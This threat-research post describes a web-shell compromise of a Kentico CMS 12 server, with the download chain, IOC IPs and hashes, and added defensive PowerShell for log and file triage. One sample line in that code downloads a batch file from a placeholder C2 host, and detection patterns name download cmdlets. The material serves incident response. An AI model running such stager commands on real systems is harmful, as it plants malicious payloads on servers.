Unraveling the Unknown: A New Threat Targeting Kentico CMS Servers

Welcome to our detailed threat research analysis, where we delve deep into a recent incident involving a compromised web server running Kentico CMS version 12. In this exploration, we’ll illuminate the infection chain, underscore the Indicators of Compromise (IOCs), and provide recommendations for fortifying your organization’s security position. By comprehending the tactics employed by threat actors and implementing proactive defense measures, you can effectively shield your web applications from similar incursions.

A New Threat Targeting Kentico Servers

• ATS has uncovered a potentially new and evolving cybersecurity threat against web servers running presumably all current hotfix versions of Kentico CMS 12.

• Threat actors are exploiting an unknown vulnerability to deploy malicious files and web shells, potentially fully compromising the underlying targeted server.

• A review of the Indicators of Compromise (IOCs) and the sequence of actions related to this threat is essential for understanding the nature of the attack and developing appropriate defensive strategies.

• We are sharing details about the observed threat activity, IOCs, and advice on how to check if your system has been compromised.

The Discovery: A Compromised Web Server

On May 30, 2023, the ATS InfoSec team observed an encoded PowerShell command being executed on a web server running Kentico CMS. The command initiated the download of a malicious .bat file from Command and Control (C2) infrastructure operated by the threat actors. This file, dll.bat, was downloaded to the public user’s root directory, C:\Users\Public.

Observed Threat Activity: A Chain of Downloads

In our investigation, we uncovered a series of exploit attempts by analyzing the IIS logs and EDR telemetry. POST requests were made to a specific unfamiliar .ashx file (/CMSInlineControls/DocumentAttachments.ashx) from a Chinese IP address. At this time, it is unknown how the malicious .ashx file was deployed to the server. This activity occurred directly before encoded PowerShell commands were executed to begin staging additional post-exploit work. Given the specificity of the file targeted, we believe this to be part of a larger campaign targeting vulnerable versions of Kentico CMS.

The compromise of the web server initiated a series of malicious activities orchestrated by the threat actors. Let’s examine the infection chain step by step:

• Encoded PowerShell commands were executed via a web shell that was discovered on the server. The commands used Invoke-WebRequest to connect to external malicious C2 infrastructure and download a malicious batch file to C:\Users\Public\dll.bat.

• dll.bat was executed, connecting to the same C2 to download a malicious Visual Basic script to C:\Windows\System32\inetsrv\DownloadFile.vbs.

• Subsequently, DownloadFile.vbs was executed to connect to the C2 once more and download a malicious payload to C:\Windows\System32\inetsrv\HTTPCacheLog.dll.

• Within the same minute, the threat actor deleted DownloadFile.vbs and dll.bat, a common technique to avoid detection and leave as little trace as possible.

• Interestingly, after initial staging and the deletion of all related files, there were several attempts to execute DownloadFile.vbs – even though the file had already been removed from the system.

How to Check If You Have Been Compromised

Upon identifying this security threat, ATS’s InfoSec team promptly reached out to Kentico to disclose the exploit activity we observed. This cooperative and responsible disclosure is in line with our mission to enhance overall cybersecurity and to help businesses such as those using Kentico CMS secure their operations.

Currently, our InfoSec team is diligently researching the scope of these exploits, aiming to understand their full extent and potential impact. Our investigation includes analyzing the nature of the malicious scripts, their propagation methods, and the specific vulnerabilities being exploited in Kentico servers. This ongoing investigation will inform future strategies to mitigate these risks, further enhancing the security of servers running Kentico.

In light of recent security events, it is essential for all entities utilizing Kentico CMS to promptly assess their systems for the IOCs listed at the end of this post. Your swift action is paramount to preventing damage or data loss. Follow these steps to examine your system for indicators of compromise (IOCs). Additionally, you can consider enlisting the help of the ATS InfoSec team for professional guidance.

1. Keep an Eye on PowerShell Commands: Continuously monitor your system for unusual PowerShell commands. Look especially for encoded commands or commands that involve file downloads, as these can be a sign of a security breach. Also, pay attention to any suspicious .bat files that suddenly appear in your public user’s root directory (C:\Users\Public).

2. Scrutinize Your IIS Installation Directory: Check your C:\Windows\System32\inetsrv directory for any unfamiliar .vbs or .dll files. The presence of these could indicate a breach or attempted breach.

3. Inspect Network Logs for Outbound Connections: Carefully examine network logs for any outbound or inbound connections with the IP addresses listed in the IOC section of this post. Such connections could be a sign that your systems are communicating with a potential threat actor.

4. Strengthen Endpoint Security: Implement and maintain robust endpoint security solutions capable of detecting and isolating malicious files. Modern EDR solutions are extremely helpful in combating new and unknown threats.
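The following PowerShell is an added example for steps 1 and 3 above and for the staging chain described earlier; it is not code from the ATS post. It decodes `-EncodedCommand` arguments the way powershell.exe does (Base64 over UTF-16LE), flags command lines that combine a download cmdlet with a write into C:\Users\Public or the inetsrv directory, and scans W3C-format IIS log lines for POSTs to /CMSInlineControls/DocumentAttachments.ashx and for requests from the IOC IPs. Every sample command line and log line is constructed for the demonstration, and the download host c2-placeholder.invalid is a placeholder, not an observed C2.

```powershell
# Added example, not code from the ATS post: triage helpers for checklist
# steps 1 and 3. All sample command lines and IIS log lines are constructed;
# the download host is a placeholder, not an observed C2.

function ConvertFrom-EncodedCommandLine {
    # Extracts the Base64 argument that follows -EncodedCommand (or one of the
    # prefixes powershell.exe accepts: -e, -ec, -en, -enc) and decodes it as
    # UTF-16LE, which is the encoding that switch expects. Returns $null when
    # the command line carries no encoded command.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Test-SuspiciousPowerShell {
    # Scores a process command line against the staging pattern from the post:
    # an encoded command, a download cmdlet, a write under \Users\Public or
    # \inetsrv, and a .bat/.vbs/.dll drop. Two or more reasons = suspicious.
    param([Parameter(Mandatory)][string]$CommandLine)
    $decoded = ConvertFrom-EncodedCommandLine -CommandLine $CommandLine
    $text    = if ($decoded) { $decoded } else { $CommandLine }
    $reasons = @()
    if ($decoded) { $reasons += 'encoded command' }
    if ($text -match '(?i)invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|net\.webclient') {
        $reasons += 'download cmdlet'
    }
    if ($text -match '(?i)\\users\\public\\|\\inetsrv\\') { $reasons += 'staging path' }
    if ($text -match '(?i)\.(bat|vbs|dll)\b') { $reasons += 'script/binary drop' }
    [pscustomobject]@{ Suspicious = ($reasons.Count -ge 2); Reasons = $reasons; Decoded = $decoded }
}

function Find-IisLogIndicators {
    # Parses W3C IIS log lines using their own '#Fields:' header, then reports
    # POSTs to the unfamiliar handler and any request from an IOC client IP.
    param(
        [Parameter(Mandatory)][string[]]$LogLines,
        [string[]]$IocIps = @('216.83.45.170', '172.16.162.4'),
        [string]$HandlerPath = '/CMSInlineControls/DocumentAttachments.ashx'
    )
    $fields = @()
    foreach ($line in $LogLines) {
        if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\s*', '') -split '\s+'; continue }
        if ($line.StartsWith('#') -or -not $fields) { continue }
        $values = $line -split '\s+'
        $row = @{}
        for ($i = 0; $i -lt [Math]::Min($fields.Count, $values.Count); $i++) { $row[$fields[$i]] = $values[$i] }
        $hits = @()
        if ($row['cs-method'] -eq 'POST' -and $row['cs-uri-stem'] -eq $HandlerPath) { $hits += 'POST to unfamiliar handler' }
        if ($IocIps -contains $row['c-ip']) { $hits += 'IOC client IP' }
        if ($hits) {
            [pscustomobject]@{ Time = "$($row['date']) $($row['time'])"; ClientIp = $row['c-ip']; Uri = $row['cs-uri-stem']; Why = ($hits -join ', ') }
        }
    }
}

# Constructed sample data. The stager text is built and encoded in-script so the
# Base64 is exact; the host is a placeholder. Times are illustrative only.
$script:SampleStager  = 'Invoke-WebRequest -Uri http://c2-placeholder.invalid/dll.bat -OutFile C:\Users\Public\dll.bat'
$script:SampleEncoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script:SampleStager))
$script:SampleCommandLines = @(
    "powershell.exe -enc $script:SampleEncoded",
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\NightlyBackup.ps1',
    'powershell.exe -Command "Get-Service W3SVC"'
)
$script:SampleIisLog = @(
    '#Software: Microsoft Internet Information Services 10.0',
    '#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status',
    '2023-05-30 13:01:02 10.0.0.5 GET /Home.aspx - 443 - 198.51.100.7 Mozilla/5.0 200',
    '2023-05-30 13:02:10 10.0.0.5 POST /CMSInlineControls/DocumentAttachments.ashx - 443 - 203.0.113.9 Mozilla/5.0 200',
    '2023-05-30 13:02:11 10.0.0.5 GET /CMSPages/GetResource.ashx - 443 - 172.16.162.4 Mozilla/5.0 200'
)

# Stand-alone run over the constructed samples: only the encoded stager is
# reported from the command lines; two of the three log lines are reported.
foreach ($cl in $script:SampleCommandLines) {
    $verdict = Test-SuspiciousPowerShell -CommandLine $cl
    if ($verdict.Suspicious) { Write-Output "SUSPICIOUS ($($verdict.Reasons -join ', ')): $($verdict.Decoded)" }
}
Find-IisLogIndicators -LogLines $script:SampleIisLog | Format-Table -AutoSize
```

To run this against live data, feed `Test-SuspiciousPowerShell` the CommandLine field of Security event 4688 (available when process command-line auditing is enabled, as `Properties[8].Value` on the objects returned by `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}`), and feed `Find-IisLogIndicators` the output of `Get-Content` over the site's logs under the default C:\inetpub\logs\LogFiles\W3SVC*\ directory. One caveat on the IP list: 172.16.162[.]4 lies in RFC 1918 private address space, so a match on it most likely identifies a proxy or load balancer in front of IIS in your own environment rather than the attacker's origin; use it as a pivot to find the upstream client rather than as a blocklist entry.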

These actions aren’t just recommendations; they’re necessary steps to safeguard your valuable digital assets. Remember, prompt detection can be the difference between a minor security concern and a significant system breach.

Indicators of Compromise (IOCs)

IPs:

216.83.45[.]170 - C2 server hosting malicious payloads
172.16.162[.]4 - inbound HTTP connections to web shells

File Hashes (SHA-1):

471c6529683afbe3530092daaf5e8a1813c07d4b - HTTP interpreter, handling RijndaelManaged encryption for the web shell
eb940f761950cb534a370a67dd08973671493c4a - web shell file requiring an authentication string, “youdu”
fec7ae1711175f0df1fd603954b6fde717d4082c - web shell file
74323bfc140ba7a62866260eb89826cae8d19eeb - web shell file
aacd483ccadab7e9aec8dcc2322a0a19e82f0907 - first stage post-exploit .bat file
c7583c8cb35b38526bae31142fe92eebd2cc635e - first stage post-exploit .bat file
3bfd269a39b80f09568dc976a0453cc8c9ff55df - second stage post-exploit .vbs file
f6be54ad941dc3fe84a368842685d58eaf87997c - third stage post-exploit .dll file
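As an added example for checklist step 2 and for the hash list above (not code from the ATS post), the following PowerShell sweeps the directories named in the post for the dropped file names, compares the SHA-1 of every script, DLL and handler file it finds against the published hashes, and flags DLLs in inetsrv that lack a valid Authenticode signature or were written recently. The default paths are assumptions: C:\inetpub\wwwroot is only a common site root, and the recent-write window of 90 days is an arbitrary triage choice.

```powershell
# Added example, not code from the ATS post: file-system sweep for the IOCs.
# Hashes and file names come from the post; default paths are assumptions.

$script:IocSha1 = @{
    '471c6529683afbe3530092daaf5e8a1813c07d4b' = 'HTTP interpreter for the web shell (RijndaelManaged)'
    'eb940f761950cb534a370a67dd08973671493c4a' = 'web shell (authentication string "youdu")'
    'fec7ae1711175f0df1fd603954b6fde717d4082c' = 'web shell'
    '74323bfc140ba7a62866260eb89826cae8d19eeb' = 'web shell'
    'aacd483ccadab7e9aec8dcc2322a0a19e82f0907' = 'first stage post-exploit .bat'
    'c7583c8cb35b38526bae31142fe92eebd2cc635e' = 'first stage post-exploit .bat'
    '3bfd269a39b80f09568dc976a0453cc8c9ff55df' = 'second stage post-exploit .vbs'
    'f6be54ad941dc3fe84a368842685d58eaf87997c' = 'third stage post-exploit .dll'
}
$script:IocFileNames = @('dll.bat', 'DownloadFile.vbs', 'HTTPCacheLog.dll', 'DocumentAttachments.ashx')

function Find-KenticoIocFiles {
    # Walks each root, hashes candidate files and returns one object per file
    # that matches an IOC name or hash, or that looks out of place in inetsrv.
    param(
        # Assumed locations: the two directories from the post plus a common site root.
        [string[]]$Path = @("$env:SystemRoot\System32\inetsrv", 'C:\Users\Public', 'C:\inetpub\wwwroot'),
        [int]$Days = 90   # assumed triage window for "recently written"
    )
    $since = (Get-Date).AddDays(-$Days)
    foreach ($root in $Path) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -File -Recurse -Force -ErrorAction SilentlyContinue |
          Where-Object { $_.Extension -in '.bat', '.vbs', '.dll', '.ashx', '.aspx', '.asmx' } |
          ForEach-Object {
            $reasons = @()
            if ($script:IocFileNames -contains $_.Name) { $reasons += 'IOC file name' }
            $sha1 = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA1 -ErrorAction SilentlyContinue).Hash
            if ($sha1 -and $script:IocSha1.ContainsKey($sha1.ToLower())) {
                $reasons += "IOC hash: $($script:IocSha1[$sha1.ToLower()])"
            }
            if ($root -like '*inetsrv*') {
                # Microsoft's own inetsrv DLLs are signed; an invalid or missing
                # signature is a prompt to look closer, not a verdict by itself
                # (catalog-signed files can report NotSigned on some hosts).
                if ($_.Extension -eq '.dll') {
                    $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                    if ($sig.Status -ne 'Valid') { $reasons += "signature $($sig.Status)" }
                }
                if ($_.LastWriteTime -ge $since) { $reasons += 'recent write in inetsrv' }
            }
            if ($reasons) {
                [pscustomobject]@{ Path = $_.FullName; Sha1 = $sha1; LastWrite = $_.LastWriteTime; Why = ($reasons -join '; ') }
            }
          }
    }
}

# Stand-alone run: review every hit; IOC name or hash matches are the strong signals.
Find-KenticoIocFiles | Sort-Object Why -Descending | Format-Table -AutoSize
```

Point `-Path` at your actual Kentico site root if it is not under C:\inetpub\wwwroot, and remember that the attacker deleted dll.bat and DownloadFile.vbs within a minute of staging, so an empty result from the name and hash checks does not clear the host; the PowerShell and IIS log checks from step 1 and step 3 still apply.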

You’re not alone in this. The ATS InfoSec team is ready and able to support you. If you’re uncertain about your ability to carry out these checks, or if you’d like professional assistance to ensure nothing is overlooked, don’t hesitate to reach out. Our team of experts can help guide you through these checks and advise on any necessary next steps.

Tim Goodman

Tim Goodman is a seasoned Senior InfoSec Analyst at ATS with over 10 years of diverse technology experience. He specializes in designing, deploying, supporting, and securing technology for organizations of all sizes and industries. Tim's expertise and passion for ensuring the utmost security and efficiency make him a trusted advisor in the ever-evolving digital landscape.
